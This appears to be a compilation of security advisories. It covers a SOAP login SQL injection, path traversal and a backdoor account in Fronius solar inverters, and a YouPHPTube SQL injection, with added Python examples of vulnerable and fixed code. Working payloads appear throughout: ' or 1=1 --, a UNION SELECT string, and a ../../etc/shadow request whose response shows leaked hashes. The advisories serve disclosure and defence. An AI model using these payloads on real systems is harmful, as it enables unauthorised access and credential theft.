Content-Length: 406

<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:s="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<SOAP-ENV:Body>
<tns:Login xmlns:tns="http://tempuri.org/">
<tns:sUser>' or 1=1 --</tns:sUser>
<tns:sPwd>string</tns:sPwd>
<tns:sLang>ENG</tns:sLang>
</tns:Login>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>

Example of a successful login

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Type: text/xml; charset=utf-8
Vary: Accept-Encoding
X-AspNet-Version: 4.0.30319
X-Powered-By: XXX.XXX
Connection: close
Content-Length: 422

<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"><soap:Body><LoginResponse xmlns="http://tempuri.org/"><LoginResult><ListMsg /><ErrLevel>0</ErrLevel><MetaData /><data>d62cc3c0b2e3413cb8b4a85b0fa6177b</data></LoginResult></LoginResponse></soap:Body></soap:Envelope>
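The SOAP injection above works because the `coUser` / `sUser` value is spliced into a SQL string: the quote closes the literal, `or 1=1` makes the WHERE clause true and `--` discards the password check. The following added example (not SSDWLAB code; the table and both the Login and EditUserPassword logic are constructed stand-ins) reproduces that on an in-memory SQLite database and shows the parameterised form that the same payload cannot break.

```python
"""String-built versus parameterised SQL, driven by the advisory's payload."""
import sqlite3

PAYLOAD = "' or 1=1 --"   # value sent in <coUser> / <tns:sUser> above


def make_db():
    """Constructed stand-in for the application's user table (not the real schema)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (co_user TEXT PRIMARY KEY, pwd TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?)",
                    [("alice", "correct horse"), ("bob", "battery staple")])
    return con


def login_vulnerable(con, user, pwd):
    # user input is formatted straight into the statement: the quote closes
    # the literal, "or 1=1" makes the WHERE true, "--" comments out the rest
    sql = f"SELECT co_user FROM users WHERE co_user = '{user}' AND pwd = '{pwd}'"
    row = con.execute(sql).fetchone()
    return row[0] if row else None


def login_fixed(con, user, pwd):
    # bound parameters never take part in SQL parsing
    sql = "SELECT co_user FROM users WHERE co_user = ? AND pwd = ?"
    row = con.execute(sql, (user, pwd)).fetchone()
    return row[0] if row else None


def change_password_vulnerable(con, user, old_pwd, new_pwd):
    """Models the EditUserPassword path; returns the number of rows changed."""
    sql = (f"UPDATE users SET pwd = '{new_pwd}' "
           f"WHERE co_user = '{user}' AND pwd = '{old_pwd}'")
    return con.execute(sql).rowcount


def change_password_fixed(con, user, old_pwd, new_pwd):
    sql = "UPDATE users SET pwd = ? WHERE co_user = ? AND pwd = ?"
    return con.execute(sql, (new_pwd, user, old_pwd)).rowcount


def demo():
    """Runs the payload through both variants and returns what each did."""
    con = make_db()
    result = {
        "login_vulnerable": login_vulnerable(con, PAYLOAD, "string"),
        "login_fixed": login_fixed(con, PAYLOAD, "string"),
        # the injected UPDATE hits every row: every account now has pwd 'string'
        "rows_rewritten_vulnerable": change_password_vulnerable(con, PAYLOAD, "x", "string"),
        "rows_rewritten_fixed": change_password_fixed(con, PAYLOAD, "x", "string"),
    }
    # after the injected UPDATE even a correct login routine accepts the new password
    result["bob_after_injection"] = login_fixed(con, "bob", "string")
    return result


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value!r}")
```

The `change_password_*` pair is the part worth noting for this advisory: a fixed Login alone does not help once an injectable EditUserPassword has rewritten every password, so both endpoints (and any other that builds SQL from SOAP fields) need the parameterised form.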

Fronius Solar Inverter Series Insecure Communication / Path Traversal


Fronius Solar Inverter Series with software versions below 3.14.1 (HM 1.12.1) suffer from unencrypted communication and path traversal vulnerabilities.


MD5 | 0caf8457f509b9b49092b83b93420e13

SEC Consult Vulnerability Lab Security Advisory < 20191203-0 >
=======================================================================
title: Multiple vulnerabilities
product: Fronius Solar Inverter Series
vulnerable version: SW Version <3.14.1 (HM 1.12.1)
fixed version: >=3.14.1 (vuln 2: 3.12.5 - HM 1.10.5), see solution
section below
CVE number: CVE-2019-19228, CVE-2019-19229
impact: High
homepage: https://www.fronius.com
found: 2018-10-31
by: T. Weber (Office Vienna)
SEC Consult Vulnerability Lab

An integrated part of SEC Consult
Europe | Asia | North America

https://www.sec-consult.com

=======================================================================

Vendor description:
-------------------
"A passion for new technologies, intensive research and revolutionary solutions
have been shaping the Fronius brand since 1945. As the technology leader, we
find, develop and implement innovative methods to monitor and control energy
for welding technology, photovoltaics and battery charging. We forge new paths,
try something difficult and succeed where others have failed in achieving what
seems to be impossible. [...]"

Source: http://www.fronius.com/en/about-fronius/company-values


Business recommendation:
------------------------
The vendor automatically performed a fleet update of the solar inverters in the field
in order to patch them. Nevertheless, as not all devices could be reached through such
an update, all remaining users are advised to install the patches provided
by the vendor immediately.


Vulnerability overview/description:
-----------------------------------
1) Unencrypted Communication
The whole communication is handled over HTTP. There is no possibility to
activate an HTTPS web service. This vulnerability cannot be fixed by the vendor
in the current solar inverter generation, see the workaround section below.


2) Authenticated Path Traversal (CVE-2019-19229)
A path traversal attack for authenticated users is possible. This allows getting
access to the operating system of the device and access information like
network configurations and connections to other hosts or potentially other
sensitive information.

This vulnerability has been fixed in March 2019 in version 3.12.5 (HM 1.10.5).

The web server runs with "nobody" privileges, but nearly all files on the
file system are world-readable and can be extracted. This can be seen as
another vulnerability but according to the vendor this cannot be fixed in the
current solar inverter generation.


3) Backdoor Account (CVE-2019-19228)
The web interface has a backdoor user account with the username "today".
This user account has all permissions of all other users ("service",
"admin" and "user") together.
As its name suggests, the password for the user "today" changes every day
and seems to be different from other devices with the same firmware. This
means that some device-specific strings (e.g. the public device-ID) are
mixed up every day to generate a new password.
This account is being used by Fronius support in order to access the
device upon request from the user.

The fix for this issue has been split in two parts. The "password reset"
part has been fixed in version 3.14.1 (HM 1.12.1) and the second part providing the
support account needs an architectural rework which will be fixed in a
future version (planned for 3.15.1 (HM 1.15.1)).

The passwords for all users of the web interface are stored in plain-text.
This can be seen as another vulnerability and it has been fixed in
version 3.14.1 (HM 1.12.1).


4) Outdated and Vulnerable Software Components
Outdated and vulnerable software components were found on the device during
a quick examination. Not all of the outdated components can be fixed by the vendor
in the current solar inverter generation, see the workaround section below.


Proof of concept:
-----------------
1) Unencrypted Communication
By using an interceptor proxy this vulnerability can be verified in a
simple way.


2) Authenticated Path Traversal (CVE-2019-19229)
By sending the following request to the following endpoint, a path traversal
vulnerability can be triggered:
http://<IP-Address>/admincgi-bin/service.fcgi

Request to read the "/etc/shadow" password file:
┌──────────────────────────────────────────────────────────────────────────────
|GET /admincgi-bin/service.fcgi?action=download&filename=../../../../../etc/shadow
└──────────────────────────────────────────────────────────────────────────────

In the response, the file is returned without line breaks. In this example the
line breaks are added for better readability:

┌──────────────────────────────────────────────────────────────────────────────
|HTTP/1.1 200 OK
|Content-Type: application/force-download
|Content-Disposition: attachment; filename=../../../../../etc/shadow
|Connection: close
|Date: Sun, 28 Oct 2018 08:20:27 GMT
|Server: webserver
|
|root:$1$6MNb1Vq3$oU4TaPqQ782Y2ybdWLICh1:0:1:99999:7:::
|nobody:*:10897:0:99999:7:::
|messagebus:$1$6JrvtnWp$T.JvjxjbGTCD.jF7.hhb3.:15638:0:99999:7:::
└──────────────────────────────────────────────────────────────────────────────

By retrieving the file "/etc/issue" an easter-egg was found:
┌──────────────────────────────────────────────────────────────────────────────
| __ ___ _ _ _ _ __ ___ _ __ __ _
|\\ \\ / (_|_|_|_) |_ __ __ _ __ _ __ _ / / | \\| | \\ \\ / /___| |__
| \\ \\/\\/ /| | | | | | ' \\/ _` / _` / _` | / / | |) | |__ \\ \\/\\/ // -_) '_ \\
| \\_/ \\_/ |_|_|_|_|_|_|_|_\\__,_\\__,_\\__,_| /_/ |___/|____| \\_/ \\_/\\___|_.__/
|Congratulations to all non Fronius employees which have come so far :)
└──────────────────────────────────────────────────────────────────────────────
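The `filename=../../../../../etc/shadow` download above succeeds because the CGI joins the parameter onto its base directory and never checks where the result landed. Added example, not Fronius code: a resolver that normalises the requested name, rejects anything that leaves the download directory (climbing with `..`, absolute paths, NUL bytes, symlinks pointing outside), plus a self-test that builds a throwaway directory. `DOWNLOAD_DIR` is a hypothetical base path.

```python
"""Containing a user-supplied download filename inside one directory."""
import os
import posixpath
import tempfile

DOWNLOAD_DIR = "/var/www/downloads"   # hypothetical base directory


def safe_download_path(base, requested):
    """Pure-path check. Returns the joined path, or None when `requested`
    would escape `base` (../ climbing, absolute path, NUL byte, backslash)."""
    if not requested or "\x00" in requested or "\\" in requested:
        return None
    base = posixpath.normpath(base)
    candidate = posixpath.normpath(posixpath.join(base, requested))
    # a legitimate result is strictly below base: "<base>/<something>"
    if not candidate.startswith(base + "/"):
        return None
    return candidate


def resolve_on_disk(base, requested):
    """Filesystem-aware variant: also resolves symlinks with realpath, so a
    link placed inside the directory cannot point outside it."""
    if safe_download_path(base, requested) is None:
        return None
    real_base = os.path.realpath(base)
    target = os.path.realpath(os.path.join(real_base, requested))
    if os.path.commonpath([real_base, target]) != real_base:
        return None
    return target if os.path.isfile(target) else None


def demo():
    """Builds a temporary directory holding a real file and an escaping
    symlink, then shows which requests the resolver lets through."""
    with tempfile.TemporaryDirectory() as tmp:
        base = os.path.join(tmp, "downloads")
        os.mkdir(base)
        with open(os.path.join(base, "export.log"), "w") as fh:
            fh.write("ok\n")
        outside = os.path.join(tmp, "secret.txt")   # stands in for /etc/shadow
        with open(outside, "w") as fh:
            fh.write("not for download\n")
        os.symlink(outside, os.path.join(base, "link"))
        return {
            "plain": resolve_on_disk(base, "export.log") is not None,
            "traversal": resolve_on_disk(base, "../secret.txt"),
            "symlink": resolve_on_disk(base, "link"),
        }


if __name__ == "__main__":
    print(safe_download_path(DOWNLOAD_DIR, "../../../../../etc/shadow"))
    print(safe_download_path(DOWNLOAD_DIR, "export.log"))
    print(demo())
```

The two-stage check matters on devices like this one: the pure-path test is cheap and can also be applied to the `Content-Disposition` filename echoed back in the response, while the realpath stage is what catches a symlink that the pure-path test cannot see.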

3) Backdoor Account (CVE-2019-19228)
The passwords of the web interface of the affected versions are stored in the file
"/tmp/web_users.conf" in clear text:
┌──────────────────────────────────────────────────────────────────────────────
|admin:<user-password>
|service:<user-password>
|today:<40-bit hash-value>
└──────────────────────────────────────────────────────────────────────────────

The password for "today", which is generated by some algorithm, is suspected
to be a sha1-hash which includes the system-time. A detailed firmware analysis
can reveal the algorithm but has not been performed for this advisory.


4) Outdated and Vulnerable Software Components
By using the path traversal vulnerability (2) a lot of components are found to
be outdated:

* Busybox 1.22.1 (December 23, 2014) multiple CVEs
* Lighttpd 1.4.33 (September 27, 2013) multiple CVEs
* Linux kernel 4.1.39 (March 13, 2017) multiple CVEs

The used SDK is based on the OSELAS toolchain from 2011 and U-Boot from 2012:
* gcc version 4.6.2 (OSELAS.Toolchain-2011.11.1)
* U-Boot 2012.07-3


Vulnerable / tested versions:
-----------------------------
The Fronius Symo 10.0-3-M (1) SWVersion 3.10.3-1 (HM 1.9.2) was tested but more solar
inverters from Fronius share this firmware. The following list has been provided by
the vendor:

Symo Hybrid 3.0-3-M
Symo Hybrid 4.0-3-M
Symo Hybrid 5.0-3-M
Datamanager Box 2.0
Symo 3.0-3-M *)
Symo 3.0-3-S *)
Symo 3.7-3-M *)
Symo 3.7-3-S *)
Symo 4.5-3-M *)
Symo 4.5-3-S *)
Symo 5.0-3-M *)
Symo 6.0-3-M *)
Symo 7.0-3-M *)
Symo 8.2-3-M *)
Symo 10.0-3-M *) (tested)
Symo 10.0-3-M-OS *)
Symo 12.5-3-M *)
Symo 15.0-3-M *)
Symo 17.5-3-M *)
Symo 20.0-3-M *)
Galvo 1.5-1 *)
Galvo 2.0-1 *)
Galvo 2.5-1 *)
Galvo 3.0-1 *)
Galvo 3.1-1 *)
Galvo 1.5-1 208-240 *)
Galvo 2.0-1 208-240 *)
Galvo 2.5-1 208-240 *)
Galvo 3.1-1 208-240 *)
Primo 3.0-1 *)
Primo 3.5-1 *)
Primo 3.6-1 *)
Primo 4.0-1 *)
Primo 4.6-1 *)
Primo 5.0-1 *)
Primo 5.0-1 AUS *)
Primo 5.0-1 SC *)
Primo 6.0-1 *)
Primo 8.2-1 *)
Primo 3.8-1 208-240 *)
Primo 5.0-1 208-240 *)
Primo 6.0-1 208-240 *)
Primo 7.6-1 208-240 *)
Primo 8.2-1 208-240 *)
Primo 10.0-1 208-240 *)
Primo 11.4-1 208-240 *)
Primo 12.5-1 208-240 *)
Primo 15.0-1 208-240 *)
Symo 10.0-3 208-240 *)
Symo 10.0-3 480 *)
Symo 12.0-3 208-240 *)
Symo 12.5-3 480 *)
Symo 15.0-3 107 *)
Symo 15.0-3 480 *)
Symo 17.5-3 480 *)
Symo 20.0-3 480 *)
Symo 22.7-3 480 *)
Symo 24.0-3 480 *)
Eco 25.0-3-S *)
Eco 27.0-3-S *)
Symo Advanced 10.0-3 208-240 *)
Symo Advanced 12.0-3 208-240 *)
Symo Advanced 15.0-3 480 *)
Symo Advanced 20.0-3 480 *)
Symo Advanced 22.7-3 480 *)
Symo Advanced 24.0-3 480 *)
*) only with Datamanager card/box


Vendor contact timeline:
------------------------
2018-11-05: Contacting vendor through contact@fronius.com, requesting
security contact
2018-11-06: Vendor replies and confirms security issues
2018-12-03: Meeting with vendor to discuss security issues
2019-01 - 2019-11: Multiple conference calls discussing Fronius' rollout plan and fixes
2019-03-18: Release of version 3.12.5 (HM 1.10.5) which fixes the path traversal vulnerability
2019-07-30: Release of version 3.14.1 (HM 1.12.1) which fixes many of the other reported issues
2019-08 - 2019-11: Testing and fleet update to version 3.14.1 (HM 1.12.1)
2019-12-03: Coordinated release of security advisory


Solution:
---------
The vendor provides a patched firmware via their download portal. Visit the
download page, search for "firmware update" and choose the
"Fronius Solar.update Datamanager V3.14.1-10" firmware.

The new version 3.14.1 (HM 1.12.1), which contains most of the security fixes, can
also be downloaded directly:
https://www.fronius.com/~/downloads/Solar%20Energy/Firmware/SE_FW_Fronius_Solar.update_Datamanager_EN.zip

Some of the identified vulnerabilities (e.g. issue 1 and parts of 4) cannot be fixed
in the current solar inverter product/software generation. Issue 2 (path traversal)
has been fixed in version 3.12.5 (HM 1.10.5).


Workaround:
-----------
Restrict network access to the device as much as possible and do not forward ports
to it from the Internet. Fronius Solar.Web access remains possible.


Advisory URL:
-------------
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult
Europe | Asia | North America

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/career/index.html

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/contact/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF T. Weber / @2019


YouPHPTube 7.7 SQL Injection

YouPHPTube versions 7.7 and below suffer from a remote SQL injection vulnerability in getChat.json.php.


MD5 | bda45fa0236ae4d5e784d5a3ac75112a

----------------------------------------------------------------
YouPHPTube <= 7.7 (getChat.json.php) SQL Injection Vulnerability
----------------------------------------------------------------


[-] Software Link:

https://www.youphptube.com


[-] Affected Versions:

Version 7.7 and prior versions.


[-] Vulnerability Description:

User input passed through the "live_stream_code" POST parameter to
/plugin/LiveChat/getChat.json.php is not properly sanitized before
being used to construct a SQL query. This can be exploited by malicious
users to e.g. read sensitive data from the database through in-band SQL
Injection attacks. Successful exploitation of this vulnerability
requires the "Live Chat" plugin to be enabled (disabled by default).
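The bug class described above, a request parameter spliced into SQL text, next to
its parameterised fix, as an added example that is not YouPHPTube's code. The table
and column names, the data and the use of an in-memory SQLite database are all
constructed for the demonstration; the real endpoint is PHP against MySQL, where
the same UNION payload and the same remedy (prepared statements with bound
parameters) apply.

```python
import sqlite3

# Constructed stand-in schema and data; not YouPHPTube's tables or code.
SCHEMA = """
CREATE TABLE live_chat (id INTEGER PRIMARY KEY, live_stream_code TEXT, message TEXT);
CREATE TABLE users     (id INTEGER PRIMARY KEY, user TEXT, password_hash TEXT);
INSERT INTO live_chat (live_stream_code, message) VALUES ('abc123', 'hello from stream abc123');
INSERT INTO users (user, password_hash) VALUES ('admin', '5f4dcc3b5aa765d61d8327deb882cf99');
"""


def build_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.executescript(SCHEMA)
    return con


def get_chat_vulnerable(con: sqlite3.Connection, live_stream_code: str) -> list:
    """The bug class: the request parameter is concatenated into the SQL text,
    so quote characters in it change the statement's structure."""
    sql = ("SELECT live_stream_code, message FROM live_chat "
           "WHERE live_stream_code = '" + live_stream_code + "'")
    return con.execute(sql).fetchall()


def get_chat_fixed(con: sqlite3.Connection, live_stream_code: str) -> list:
    """Remediation: the value is bound as a parameter, so it is only ever data."""
    sql = ("SELECT live_stream_code, message FROM live_chat "
           "WHERE live_stream_code = ?")
    return con.execute(sql, (live_stream_code,)).fetchall()


# In-band (UNION-based) payload: closes the string literal, appends a SELECT
# against another table with the same column count, and comments out the
# closing quote that the application appends.
UNION_PAYLOAD = "x' UNION SELECT user, password_hash FROM users -- "


if __name__ == "__main__":
    con = build_db()
    print(get_chat_vulnerable(con, UNION_PAYLOAD))  # [('admin', '5f4dcc3b5aa765d61d8327deb882cf99')]
    print(get_chat_fixed(con, UNION_PAYLOAD))       # []
```

The vulnerable variant returns the users row because the payload becomes part of
the statement; the fixed variant returns nothing because the whole payload is
compared as a literal stream code. Escaping the input instead of binding it is a
weaker fix and is easy to get wrong with multibyte character sets.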


[-] Solution:

Upgrade to version 7.8 or later.


[-] Disclosure Timeline:

[31/10/2019] - Issue reported to https://git.io/JeD2U
[02/11/2019] - CVE number assigned
[02/12/2019] - Version 7.8 released
[04/12/2019] - Publication of this advisory


[-] CVE Reference:

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the name CVE-2019-18662 to this vulnerability.


[-] Credits:

Vulnerability discovered by Egidio Romano.


[-] Original Advisory:

http://karmainsecurity.com/KIS-2019-10



